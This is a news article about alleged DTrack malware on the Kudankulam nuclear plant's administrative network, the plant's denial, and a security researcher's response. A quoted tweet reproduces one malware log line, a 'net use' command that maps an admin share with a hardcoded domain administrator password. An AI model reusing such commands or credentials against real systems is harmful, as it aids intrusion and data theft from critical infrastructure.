Kudankulam Nuclear Power Plant has denied rumours that the facility had come under cyber-attack. A statement issued by the Training Superintendent and Information Officer R Ramdoss said that some false information is being propagated on social media platforms, electronic media and print media.
Rumours of cyber-attack on the Kudankulam Nuclear Power Plant were spread on social media after cybersecurity expert Pukhraj Singh had made the allegations. He had tweeted that attackers had gained Domain controller-level access at the Nuclear Power Plant. He said that Extremely mission-critical targets were hit in this attack.
So, it’s public now. Domain controller-level access at Kudankulam Nuclear Power Plant. The government was notified way back. Extremely mission-critical targets were hit. https://t.co/rFaTeOsZrw pic.twitter.com/OMVvMwizSi
— Pukhraj Singh (@RungRage) October 28, 2019
Pukhraj Singh, who had played an instrumental role in setting up the National Technical Research Organisation, the technical intelligence agency of India, a third party had detected the unauthorised intrusion who had contacted him about the issue. He said that he, in turn, informed the National Cyber Security Coordinator about the report of the attack on September 4th. Singh said that later the incident was reported by cybersecurity and anti-virus provider Kaspersky, who called it DTrack.
An unnamed cybersecurity expert and Twitter user posted logs of data allegedly mined during the attack.
Interesting potential DTRACK (CC @Mao_Ware )
Dumps the data mined output via manually mapped share over SMB to RFC1918 address with a statically encoded user/pass:
> net use \\\\10.38.1.35\\C$ su.controller5kk /user:KKNPP\\administrator
— く̱͕̘͚ず̡̭̠ (@a_tweeter_user) October 28, 2019
The logs show that the systems were infected with DTrack malware. According to Kaspersky, this is a remote access Trojan which has been targeting banks in India for over a year. This is a dual-use malware which can steal data as well as can work as a cyberespionage tool. DTrack has been linked with North Korea’s Lazarus Group, a cybercrime group. According to the logs, the malware recorded keylogging, local IP addresses, mac addresses, operating system information, browser history, network configuration information, running processes, a listing of all files on all disks etc and sent the same to its creators.
Social media users quickly connected the reports of cyber-attack with a report this month saying that the second 1,000 MW nuclear power unit at Kudankulam had stopped operating. It was reported that the plant had stopped generating power due to “steam generation level low”.
Although the alleged log of the so-called cyber-attack show data being stolen from the plant, it does not show any command being sent to disrupt operations. Therefore, the stopping of operations may not be linked to the attack, even it had happened.
But the authorities have now denied all these speculations. The statement issued by the Kudankulam Nuclear Power Plant said that KKNPP and other Indian Nuclear Power Plant Control Systems are stand-alone, they are not connected to outside cyber network and internet. Therefore, any cyberattack on the plant is not possible. The statement also said that currently, KKNPP units 1 and 2 are operating at 1000 MWe and 600 MWe without any operational or safety concerns.
Reacting to the denial, Pukhraj Singh said that he had informed National Cyber Security Coordinator Lt Gen Rajesh Pant about the intrusion on September 4th. He said that follow up emails were exchanged between them, and the issue was acknowledged by authorities. Singh refused to divulge further details citing privacy.
Seeing KKNPP’s press release, I would like to add that I notified Lt Gen Rajesh Pant (National Cyber Security Coordinator) on Sep 4. Follow-up emails were exchanged, acknowledging the issue. I would solicit no further enquiries on the matter, requesting privacy. https://t.co/SMdABbJcvQ
— Pukhraj Singh (@RungRage) October 29, 2019
Singh also clarified that the domain controller of KKNPP was compromised, not the control system, and both are different.
Due to the security risk, control systems of nuclear power plants run on ‘air-gapped’ networks, which means the internal networks are not connected with outside networks and the Internet. Hence a direct cyber-attack on such plants is not possible. But such attacks are possible if the systems are infected by the malware from inside the plant.
In the famous attack on Iranian nuclear power station by USA and Israel, the Stuxnet malware was introduced into the internal systems via a USB flash drive by a mole recruited by CIA and Mossad, it was not attacked using the internet as that was not possible. Stuxnet was a highly sophisticated malware which was executed by a very high-level joint USA-Israel operation, with ground support from their respective spy agencies. The operation was also assisted by a few other European nations, including Germany and the Netherlands. It is not known whether North Korea possess such capabilities to target Indian nuclear power plants.